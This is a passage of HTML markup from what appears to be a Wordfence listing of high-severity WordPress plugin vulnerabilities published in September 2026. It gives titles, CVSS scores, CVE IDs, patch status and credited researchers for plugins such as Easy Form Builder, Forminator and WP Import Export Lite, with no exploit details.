<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dewa-kirim-woocommerce-gojek" target="_blank" rel="noopener">Dewa Kirim – WooCommerce Gojek / Gosend</a> <span class="wfvr-software-slug">[dewa-kirim-woocommerce-gojek]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8058ea74-f872-4f08-ae4d-c8d1c2a40f08" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6615abc-ffbb-4b37-ad7a-fc8c5c09bd23" target="_blank" rel="noopener">Dictionary &lt;= 1.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88792" target="_blank" rel="noopener noreferrer">							CVE-2026-88792						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dictionary" target="_blank" rel="noopener">Dictionary</a> <span class="wfvr-software-slug">[dictionary]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6615abc-ffbb-4b37-ad7a-fc8c5c09bd23" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e675c9ef-1695-47e2-8bfe-88eae3c9a87e" target="_blank" rel="noopener">Easy Form Builder 4.0.0 &#8211; 4.1.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85122" target="_blank" rel="noopener noreferrer">							CVE-2026-85122						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-form-builder" target="_blank" rel="noopener">Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[easy-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e675c9ef-1695-47e2-8bfe-88eae3c9a87e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ed64493-e41a-4369-a1b1-2d3425941d9e" target="_blank" rel="noopener">Forminator Forms &lt;= 1.57.2.0 &#8211; Authenticated (Admin+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87068" target="_blank" rel="noopener noreferrer">							CVE-2026-87068						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ed64493-e41a-4369-a1b1-2d3425941d9e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0feb873e-0a89-4dd0-9f6b-489504f954af" target="_blank" rel="noopener">Generate PDF using Contact Form 7 &lt;= 4.2.1 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90984" target="_blank" rel="noopener noreferrer">							CVE-2026-90984						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/generate-pdf-using-contact-form-7" target="_blank" rel="noopener">Generate PDF using Contact Form 7</a> <span class="wfvr-software-slug">[generate-pdf-using-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0feb873e-0a89-4dd0-9f6b-489504f954af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cdde21b6-a5d9-4d47-9ff1-eda050822990" target="_blank" rel="noopener">GenieWords 1.5.27 &#8211; 1.5.34 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74933" target="_blank" rel="noopener noreferrer">							CVE-2026-74933						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geniewords" target="_blank" rel="noopener">GenieWords</a> <span class="wfvr-software-slug">[geniewords]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cdde21b6-a5d9-4d47-9ff1-eda050822990" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a8f482-3d4d-4a40-8e60-5264a5c71139" target="_blank" rel="noopener">Hoo Companion  1.0.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85129" target="_blank" rel="noopener noreferrer">							CVE-2026-85129						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hoo-companion" target="_blank" rel="noopener">Hoo Companion</a> <span class="wfvr-software-slug">[hoo-companion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/claudio-marchesini-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c02b90fc5c8f1415e07705b0e258922.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c02b90fc5c8f1415e07705b0e258922"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/claudio-marchesini-2" target="_blank" rel="noopener">Claudio Marchesini</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a8f482-3d4d-4a40-8e60-5264a5c71139" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/374d2c90-64f5-4690-8bff-6ac0296c7d08" target="_blank" rel="noopener">iGMS Direct Booking &lt;= 1.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88825" target="_blank" rel="noopener noreferrer">							CVE-2026-88825						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/igms-direct-booking" target="_blank" rel="noopener">iGMS Direct Booking</a> <span class="wfvr-software-slug">[igms-direct-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/374d2c90-64f5-4690-8bff-6ac0296c7d08" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15acf0bd-5e83-4513-865a-853b381c482b" target="_blank" rel="noopener">Import and export users and customers &lt;= 2.5.1 &#8211; Authenticated (Admin+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92540" target="_blank" rel="noopener noreferrer">							CVE-2026-92540						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/import-users-from-csv-with-meta" target="_blank" rel="noopener">Import and export users and customers</a> <span class="wfvr-software-slug">[import-users-from-csv-with-meta]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yzx001" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1765d6f8531a84a95bd60429d57538f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1765d6f8531a84a95bd60429d57538f0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yzx001" target="_blank" rel="noopener">yzx001</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15acf0bd-5e83-4513-865a-853b381c482b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/68c32762-38ed-4002-8ee4-6810d8471f31" target="_blank" rel="noopener">Import and export users and customers &lt;= 2.5.1 &#8211; Authenticated (Admin+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92541" target="_blank" rel="noopener noreferrer">							CVE-2026-92541						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/import-users-from-csv-with-meta" target="_blank" rel="noopener">Import and export users and customers</a> <span class="wfvr-software-slug">[import-users-from-csv-with-meta]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/binesh-madharapu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fe579addc0911a2c540649603887f8b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fe579addc0911a2c540649603887f8b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/binesh-madharapu" target="_blank" rel="noopener">Binesh Madharapu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/68c32762-38ed-4002-8ee4-6810d8471f31" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d3ca9ea5-f824-47c8-9e46-c6901da4e8a7" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Admin+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76552" target="_blank" rel="noopener noreferrer">							CVE-2026-76552						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d3ca9ea5-f824-47c8-9e46-c6901da4e8a7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a98bc45-afcd-46e7-8664-f656b9845231" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Admin+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76551" target="_blank" rel="noopener noreferrer">							CVE-2026-76551						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a98bc45-afcd-46e7-8664-f656b9845231" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f9613d32-719c-409a-b1ea-345c341ff39c" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.33 &#8211; Authenticated (Admin+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76550" target="_blank" rel="noopener noreferrer">							CVE-2026-76550						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
